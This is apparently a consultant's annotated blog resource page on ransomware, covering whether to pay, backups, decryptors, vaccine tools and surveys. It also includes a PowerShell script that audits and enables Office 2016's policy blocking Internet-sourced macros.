  • Netskope’s report on Cloud issues notes cases where, when a victim’s cloud-hosted files are encrypted, cloud service users synching to the same folder found their files being encrypted too, even though they weren’t themselves directly compromised by the ransomware. While Netskope’s Jamie Barnett told SC Magazine that “It was a blinding flash of the obvious for us,” it’s obviously a finding that more Cloud users need to take into account. It’s important to realize that if you share storage with others, their susceptibility to ransomware may become your problem too.
  • The Register reports that a CSA (Cloud Security Alliance) poll found that:
    • Some respondents would pay very large sums to extortionists to avoid data dumps
    • That gambling sites continue to be targeted with threats of DDoS attacks, often coinciding with major sporting events
    • That “… even police and law enforcement agencies [are] recommending organisations hit by the most water-tight ransomware encryption attacks to pay up to get their decryption keys.”

The article also suggests a link between the Hidden Tear open source code and the not-very-successful Linux.Encoder. Here’s an article from Computer World that makes a similar connection.

  • For the same reason, don’t try to reinstall backed-up files from an offline resource (at any rate, a write-enabled offline resource) until you’re sure the malware is no longer present and active on your system. Aryeh Goretsky’s paper on Options for backing up your computer is a good starting point if you need more information on backing up your data.
  • Using security software to remove the ransomware doesn’t usually restore the encrypted files. Unfortunately, removing the malware while the files are still encrypted may make it impossible to restore them even by paying the ransom. Maybe you should look on a ransomware attack as the universe’s way of telling you to use anti-malware, but before you install it or update what protection you have, you might want to make sure that your files are restorable (or restored and safe from further damage), if they aren’t already safely backed up. Or bite the bullet and accept that they’re gone. Corporate systems administrators often simply nuke the system and reinstall everything.
  • Yes, I provide consultancy to the security industry, so you’d expect me to advocate security software, but I happen to think it’s foolhardy not to use it. I have nearly thirty years’ experience in security, but I certainly wouldn’t want to be without it. Which doesn’t mean that I think:
    • “All you need is anti-virus software.” Not true, and hasn’t been for years, though anti-virus – even free anti-virus – is better than no protection at all. At the very least the average user needs the sort of security suite that security companies who used to sell just AV would much rather sell you.
    • “Security software will protect you from ransomware (and everything else).” Not (altogether) true either. Even basic anti-virus will protect against more than the ‘anti-virus is dead’ crowd (mostly purveyors of other security solutions) would like you to think, but that doesn’t mean you can click on anything. Your first (or last) line of defence is your own common sense.
  • Not all ransomware uses unbreakable encryption. If you’re using anti-malware (I’d say ‘and you should be’ but someone always says ‘well, you would say that…’) check with the company’s helpline: they may be able to help, even if they didn’t detect the malware in the first place. Unfortunately, if you’re using free AV, you’ll probably find you’re restricted to a support forum, and the advice may be variable in quality. Yeah, I know. I would say that…
  • Security bloggers almost invariably advise you not to pay the ransom. Easy to say, when it’s not your own data that’s at stake, but an ounce of prevention (and backup) is worth a ton of Bitcoins, and doesn’t encourage the criminals to keep working on their unpleasant technologies and approaches to social engineering. Sometimes, paying the ransom doesn’t get the data back, though. Worth remembering if you’re inclined to accept the FBI’s advice to just pay up. But Virus Bulletin has an article ‘Paying a malware ransom is bad, but telling people to never do it is unhelpful advice’ and I was pretty much in agreement here: Never Pay the Ransom – Good Advice? Ryan Naraine softens slightly on the ‘never pay the ransom’ stance in How to avoid becoming the next victim of ransomware, which basically acknowledges that some institutions have real difficulty in resourcing the sort of security that defeats ransomware. On the other hand, we hear of instances where organizations pay the ransom even though they have backups, because it’s the cheaper option. I understand the economic argument, but every time a ransom is paid, it compounds the problem by encouraging the crooks. It’s also worth remembering that law enforcement is liable to advocate the path of least resistance because agencies don’t have the resources to investigate every scam or malware attack involving fairly small sums. [And the Register reports: Senate asks DHS: you don’t negotiate with terrorists, but do you pay off ransomware? – Committee asks for full details on government’s handling of extortionist malware]

(I expanded some of the content above in an article for ESET, sparked off by a conversation with Kevin Townsend, in the wake of research commissioned by Malwarebytes, on the pros and cons of paying to get your data back after a ransomware attack. Read more here: Ransomware: To pay or not to pay?)

A Bitdefender survey finds that:

  • 50% of users can’t accurately identify ransomware as a type of threat that prevents or limits access to computer data.
  • Half of victims are willing to pay up to $500 to recover encrypted data.
  • Personal documents rank first among user priorities.
  • UK consumers would pay most to retrieve files.
  • US users are the main target for ransomware.

SC Magazine’s take on the topic tells us that 44% of ransomware victims in the UK have paid to recover their data.

A survey by Kaspersky also offers a fairly downbeat assessment of how well the population in general understands ransomware: Consumers have no idea what ransomware is.

Happy endings aren’t nearly as common as I’d wish in the world of ransomware, but David Balaban’s guest blog article for Tripwire offers a few instances where decryption didn’t mean paying a ransom:

Ransomware Happy Ending: 10 Known Decryption Cases

He cites several instances of specific ransomware, but the fact that free decryption was available in some cases at the time of that article doesn’t mean that current attacks are still remediable. Almost by definition, if you’ve just been hit by ransomware, it probably wasn’t one of these, or else you’ve been attacked by an ‘improved’ version. But it’s still worth checking whether an up-to-date decryption tool is available.

  • Locker
  • Torlocker
  • Teslacrypt
  • helpme@freespeechmail.org
  • Coinvault and Bitcryptor
  • Linux.encoder.1
  • Cryptolocker
  • Cryptinfinite
  • Radamant
  • Cryptolocker2015

Unfortunately, recovery tools are rarely forever, and often the scammer wises up and fixes the holes in his code. So there are many cases where paying up is the only way to get your data back, if you don’t have backups. But before you do pay up, consider Balaban’s advice and ‘describe your problem on computer help forums like Bleeping Computer or Malwarebytes.’ Or, of course, contact the company that makes your security software.

[Emsisoft recently published an interview with Lawrence of Bleeping Computer – Behind the scenes of a free PC troubleshooting helpsite: Interview with BleepingComputer – that you might find of interest, as it specifically includes references to ransomware.]

Don’t just assume that the scammers are evil geniuses who can’t be beaten.

More information from ESET:

Advice from other security vendors and other organizations is available. 🙂

11th April 2016: generalist/predictive article by Cisco/Talos. RANSOMWARE: PAST, PRESENT, AND FUTURE. From the introduction: “In this blog post we explore traits of highly effective strains of self-propagating malware of the past, as well as advances in tools to facilitate lateral movement. This research is important as we expect adversaries to begin utilizing these capabilities in ransomware going forward.” Commentary by David Bisson for Graham Cluley’s blog [12th April 2016]: Are cryptoworms the future of ransomware? – Security researcher paints a gloomy outlook

Graham Cluley for Hot for Security: Malicious scripts spammed out to infect computers with ransomware

A new paper from Mandiant covers a lot of ground, including data on bulk export of PII (Personally Identifiable Information) and the exploitation of network devices as well as some interesting data and speculation about ransomware.

Commentary from Darren Pauli for The Register here.

Here are a couple of resources for businesses wondering how to set about protecting themselves from ransomware.

Writing for Bitdefender, Graham Cluley offers The Simple Way to Stop your Business from Being Extorted by Ransomware, instead of simply waiting till you get hit and have to cave in to the extortionist’s demands. His top tips will go a long way towards protecting companies, but many of them also apply to individuals. They will, of course, also help protect against other kinds of malware (and frankly, people and companies should routinely be taking precautions like these already).

Kaspersky offers a Practical Guide: Could your business survive a cryptor? I can’t comment on how good it is, since it’s accessed via a contact form that requires information I’m not prepared to give since I don’t want sales calls.

Adam Alessandrini’s Ransomware Hostage Rescue Manual. There’s also a link to the same document (plus a ‘Ransomware Attack Response Checklist and Ransomware Prevention Checklist’) in this (quite useful) article: [ALERT] 2016 Is A Ransomware Horror Show. Here Is The New Roundup! I haven’t checked that link or the additional material since it requires registration, but the manual itself is worth a look.

A useful paper from Anand Ajjan for Sophos: Ransomware: Next-Generation Fake Antivirus

A technically not-very-sound article from the BBC on The computer virus that blackmails you. It would be nice if a ‘technology reporter’ knew better than to describe all malware as ‘a virus’, and ransom isn’t the same as blackmail, though I suppose both are extortion. Still, I suppose anything that raises awareness of the problem is at least partially helpful. And while it’s not always the case that files can only be recovered from a backup version, it’s good to reinforce the idea that backups are a Good Thing.

Here’s a general article on ransomware from David Bisson that might be more useful.

Paul Ducklin has a good article on Got ransomware? What are your options?

He includes sections on:

  • Shortcuts to recovery
  • Longcuts to recovery
  • Cracking the encryption

And those cover most of the recovery options, which is what most people will probably want to know. Unfortunately, those options aren’t always there, hence the downbeat tone of the ‘What to do’ section:

What we are saying is that if you really need your files back, and you haven’t taken any precautions such as backing up, then you don’t really have any choice but to pay.

We’d rather you didn’t pay up, but if you do, we understand and respect your choice. (It’s easy to be high and mighty when it’s not your data on the line!)

I’m afraid I’m totally in agreement with that. However, he does follow up with a list of ‘useful ransomware precautions’, and we can never make too many of those recommendations either. This is certainly a case where prevention is a much better option than cure. In brief, his recommendations include, if I can summarize:

  • Good backup strategy
  • Disable macros
  • Consider viewer apps
  • Distrust attachments
  • Don’t routinely run with admin privileges
  • ‘Patch early, patch often’

Here are a couple of ‘what you need to know’ articles on ransomware. At some point I might come back to make a few comments about individual points, but in general, if you’re still puzzled as to what it’s all about, you might find some useful thoughts here.

And here’s an interesting article from Bob Covello on The new economics of data protection in a world of ransomware. The core message of Covello’s article is simple enough. Even the most expensive backup and cloning options he cites look much more attractive than paying an estimated $5,000 in the hope of having the 7ev3n gang restore your data. I do have a few caveats though, as I explained in an article Unlucky 7ev3n: greedy ransomware and how to avoid it.

TechTarget’s Kathleen Richards surveys the ransomware scene and suggests that Even with rise in crypto-ransomware, majority do not pay.

Here’s a wide-ranging paper from Bitdefender on ‘Ransomware, a Victim’s Perspective: a Study on US and European Internet Users’. Well worth a look.

And here’s a paper from Symantec on ‘The Evolution of Ransomware’.

Sophos: 8 tips for preventing ransomware

US/Canada alert/info:

5/4/16: PhishMe April Cybercrime Alert: Ransomware Attacks Expected to Increase

Webroot’s Guide to Avoid Being a Crypto-Ransomware Victim, subtitled Over 15 Practical Things You Can Do To Protect Your Organization and Data. Looks pretty useful.

[12th April 2016] Extract from blog article here: UK threat prevalence – Symantec

John Leyden for The Register has summarized Symantec’s latest Internet Security Threat Report, and focuses on UK-specific figures for threat prevalence: Spear phishers target gullible Brits more than anyone else – survey; Ransomware, 0days, malware, scams… all are up, says Symantec.

Of particular relevance to this site are the statistics for crypto ransomware attacks (up by 35% in the UK) and for tech support scams (7m attacks in 2015). Since this is described as a survey, I guess the figures are extrapolated from the surveyed population’s responses rather than from a more neutral source, but I can’t say for sure.

[9th May 2016]

Help Net Security posted a useful update referring to commentary from Kaspersky – New ransomware modifications increase 14%. Points made in the article include these:

  • The (sub)title refers to 2,896 modifications made to ransomware in the first quarter of 2016, an increase of 14%, and a 30% increase in attempted ransomware attacks.
  • According to Kaspersky, the ‘top three’ offenders are ‘Teslacrypt (58.4%), CTB Locker (23.5%), and Cryptowall (3.4%).’ Locky and Petya also get a namecheck.
  • Kaspersky also reports that mobile ransomware has increased ‘from 1,984 in Q4, 2015 to 2,895 in Q1,2016.’

Graham Cluley, for ESET, quotes the FBI: No, you shouldn’t pay ransomware extortionists. Encouragingly, the agency seems to have modified its previous stance in its more recent advisory. The agency also offers a series of tips on reducing the risk of succumbing to a ransomware attack. Basic advice, but it will benefit individuals as well as corporate users, and reduce the risk from other kinds of attack too. I was mildly amused, though, to read in the FBI tips:

– Secure your backups. Make sure they aren’t connected to the computers and networks they are backing up.

It’s a bit tricky to back up data without connecting to the system used for primary storage. I think what the FBI probably meant was that you shouldn’t have your secure backups routinely or permanently accessible from that system, since that entails the strong risk that the backups will also be encrypted.

The tips include a link to an FBI brochure that unequivocally discourages victims from paying the ransom, as well as expanding on its advice. And it is clearer on the risk to backups:

Examples might be securing backups in the cloud or physically storing offline. Some instances of ransomware have the capability to lock cloud-based backups when systems continuously back up in real time, also known as persistent synchronization. Backups are critical in ransomware; if you are infected, this may be the best way to recover your critical data.

Recovering from (and preventing) ransomware

If this is your principal reason for visiting this page, you might want to start with the AVIEN Ransomware Recovery and Prevention resource page rather than here.

[Added 10th September 2017]

Andra Zaharia, security evangelist at Heimdal, has published a very useful and exhaustive checklist for reducing your exposure to ransomware: The Anti-Ransomware Protection Plan You Need to Follow Today.

I get tired of reading ‘how to defend against ransomware’ articles that miss out vital points like not staying permanently connected to in-the-cloud storage, but this one really does cover most of the angles. Very nice.

ESET – Best practices to protect against Filecoder (ransomware) malware (other brands and advice are available)

[21 April 2016]

Graham Cluley reports for Hot for Security that Only 38% of businesses believe they will recover from a ransomware attack. He cites a study by Tripwire – Survey: 62% of Companies Lack Confidence in Ability to Confront Ransomware Threat – based on the responses of security professionals at RSA 2016.

Interestingly, Tripwire also ran a Twitter poll asking ‘What is the most important step users can take to prevent ransomware infections?’

The options and responses were:

  • 47% said ‘Don’t click suspect links’
  • 37% said ‘Back up your data often’
  • 11% said ‘Install software patches’
  • 5% said ‘Use an AV solution’

I won’t complain about the low ranking of AV here: after all, no-one is suggesting, presumably, that all those options are mutually exclusive, and in fact they’re all steps people should be taking. But I can’t help wondering who these people are who click on a link even though it’s suspicious. Isn’t the point that so many people have such an unformed view of what ‘suspicious’ really means?

[6th April 2016]

Bitdefender recently offered ‘a new vaccine tool which can protect against known and possible future versions of the CTB-Locker, Locky and TeslaCrypt crypto ransomware families by exploiting flaws in their spreading methods.’ Combination Crypto-Ransomware Vaccine Released. Bitdefender also offers a Cryptowall vaccine.

Graham Cluley discusses the new vaccine as well as the generic Cryptostalker tool. He rightly points out that ‘Prevention is better than cure… especially when cures may be impossible’ in his article Vaccine for future versions of Locky, Teslacrypt, and CTB-Locker ransomware released. Bitdefender’s Bogdan Botezatu makes it clear in an article by Lucian Constantin that the vaccine is meant to complement other security measures, not replace them.

‘Vaccine’ programs have been around pretty much as long as malware, though the type of program to which the label is attached may vary widely. However, the term is often applied to programs that take advantage of malware that inserts a recognition marker into a compromised program or system, for example as a registry entry, so that it knows that the system has been compromised. Vaccination inserts the same marker to fool the malware into thinking that compromise has taken place.

Such techniques have their place, but their useful lifespan is likely to be limited as malware authors realize that they are being used, and change their markers or their approach to recognition marking accordingly.

The problem for the end user is that their system may be threatened after the recognition marker has been changed and before the vaccination tool has been updated. If, indeed, it is updated. Mainstream security companies do try to maintain such free tools consistently (but not necessarily promptly enough to avoid the problem). However, there have been instances of freeware from other sources that may have been effective initially, but when support and maintenance ceased, they became a danger to their users simply because those users were made vulnerable by a false sense of security.

All credit to Bitdefender for adding to the protective options available for end users. I’m just worried that some users of similar tools will place all their faith in them without taking all the other precautions that can help to keep them safe(r) from ransomware.

[13-4-16] There is no simple or universal answer to a ransomware attack (apart from taking all possible precautions in advance, and there are no guarantees even then). However, the site ID Ransomware does seem to offer a way for victims to (maybe) identify the ransomware that has attacked their system. (I haven’t tested it myself.)

As I understand it, the site works like this:

  • It allows a victim to upload a file displaying ransom/payment information or one of the encrypted files, and attempts to use the uploaded file to identify the malware that implemented the attack. It currently claims to detect 52 varieties of ransomware.
  • If there is a known way of decrypting the encrypted files without paying the ransom, it directs the victim towards it.

The site doesn’t offer to decrypt files directly itself, and doesn’t want samples of the actual malware.

Standalone Decryption Utilities

I haven’t personally tested these, and they may not work against current versions of the ransomware they’re intended to work against. Note also that removing the ransomware doesn’t necessarily mean that your files will be recovered. Other companies and sites will certainly have similar resources: I’m not in a position to list them all.

Bleeping Computer Malware Removal Guides

ESET standalone tools

Included with tools for dealing with other malware.

Also: How do I clean a TeslaCrypt infection using the ESET TeslaCrypt …

Kaspersky Tools

CoinVault decryption tool
CryptXXX decryption tool

Trend Micro Tools

Emsisoft Decryptors

18-4-2016 [HT to Randy Knobloch] N.B. I haven’t tested these personally, and recommend that you read the ‘More technical information’ and ‘Detailed usage guide’ before using one of these.

AVG decryptors

‘…for the decryption of six current ransomware strains: Apocalypse, BadBlock, Crypt888, Legion, SZFLocker, and TeslaCrypt.’

Macro malware countered by Group Policy

Macro malware has been back with us for some time, now, and ransomware such as Locky has been taking advantage of that vector.

Microsoft has taken a significant step towards addressing the issue in the enterprise by restricting access to macros via Group Policy. Its blog article New feature in Office 2016 can block macros and help prevent infection doesn’t talk about ransomware directly, but of course it will help against other types of macro-exploiting malware too.

John Leyden’s article for The Register – Microsoft beefs up defences against Office macros menace – also refers, as does this Sophos commentary.
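As an added illustration (not code from Microsoft or from any of the articles above) of what that Office 2016 policy looks like on an endpoint, here is a PowerShell audit/enforcement script. It assumes the policy’s per-application registry value `blockcontentexecutionfrominternet` (DWORD, 1 = block) under the Office 16.0 Policies key; in a managed environment you would set this through the Group Policy template rather than by hand, and it only affects files that carry the ‘downloaded from the Internet’ mark, not every document with macros.

```powershell
# Added example: audit and (optionally) enforce the Office 2016 setting
# "Block macros from running in Office files from the Internet".
# Assumption: the policy is backed by a DWORD named
# blockcontentexecutionfrominternet under each application's Security key.
$Apps = 'Word', 'Excel', 'PowerPoint'
$PolicyBase = 'HKCU:\Software\Policies\Microsoft\Office\16.0'
$ValueName = 'blockcontentexecutionfrominternet'

function Get-OfficeInternetMacroBlock {
    # Returns one object per application showing whether the block is active.
    foreach ($app in $Apps) {
        $key = Join-Path $PolicyBase "$app\Security"
        $raw = $null
        if (Test-Path $key) {
            $raw = (Get-ItemProperty -Path $key -Name $ValueName `
                        -ErrorAction SilentlyContinue).$ValueName
        }
        [pscustomobject]@{
            Application = $app
            Blocked     = ($raw -eq 1)   # only an explicit 1 means "block"
            RawValue    = $raw           # $null = policy not configured
        }
    }
}

function Set-OfficeInternetMacroBlock {
    # Enables the block for all three applications; -Disable turns it off again.
    param([switch]$Disable)
    $setting = if ($Disable) { 0 } else { 1 }
    foreach ($app in $Apps) {
        $key = Join-Path $PolicyBase "$app\Security"
        if (-not (Test-Path $key)) {
            New-Item -Path $key -Force | Out-Null
        }
        Set-ItemProperty -Path $key -Name $ValueName -Value $setting -Type DWord
    }
}

# Audit first; anything reported as Blocked = False is a gap worth closing.
Get-OfficeInternetMacroBlock | Format-Table -AutoSize

# Uncomment to enforce on this user profile (for a lab or a single machine):
# Set-OfficeInternetMacroBlock
# Get-OfficeInternetMacroBlock | Format-Table -AutoSize
```

Because the value lives under HKCU, the audit reflects the current user only; a domain-applied policy for other users is checked from their profiles or via gpresult.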

Experiences and thoughts on preparation [19-April-2016]

An article by Emily Sweeney for the Boston Globe 5 things to know about ransomware is essentially a personal recollection of being a victim coupled with some basic advice, but it’s not bad advice. Except that the point I’d always stress about backups is the need to ensure that they’re not so easily accessible that reasonably advanced ransomware will be able to encrypt the backed-up material at the same time. And don’t access your offline backups until you’re sure the malware has been eradicated.

Meanwhile, a Spiceworks post describes a couple of very bad days for a sysadmin of which a Cryptowall attack was just a part. A salutary reminder that disasters aren’t always considerate enough to happen one at a time, and that it’s always worth over-engineering a corporate backup strategy.

Sean Gallagher (or at any rate an editor looking for an eye-catching headline) for Ars Technica tells us OK, panic—newly evolved ransomware is bad news for everyone – Crypto-ransomware has turned every network intrusion into a potential payday. I don’t think panic is the best response to the ransomware problem, but there’s certainly an argument for informed concern, and the article does describe some aspects that we should indeed be concerned about and take steps to address.

According to Jessica Davis, TrapX offers a tool called CryptoTrap which is claimed to use ‘deception technology to trick potential hackers and lure them away from valuable assets.’ It’s claimed to have been found effective in defending network drives against TeslaCrypt, Locky and 7ev3n.

Ransomware, Bitcoin, other payment options

What devices and platforms are affected?

Specific Ransomware Families and Types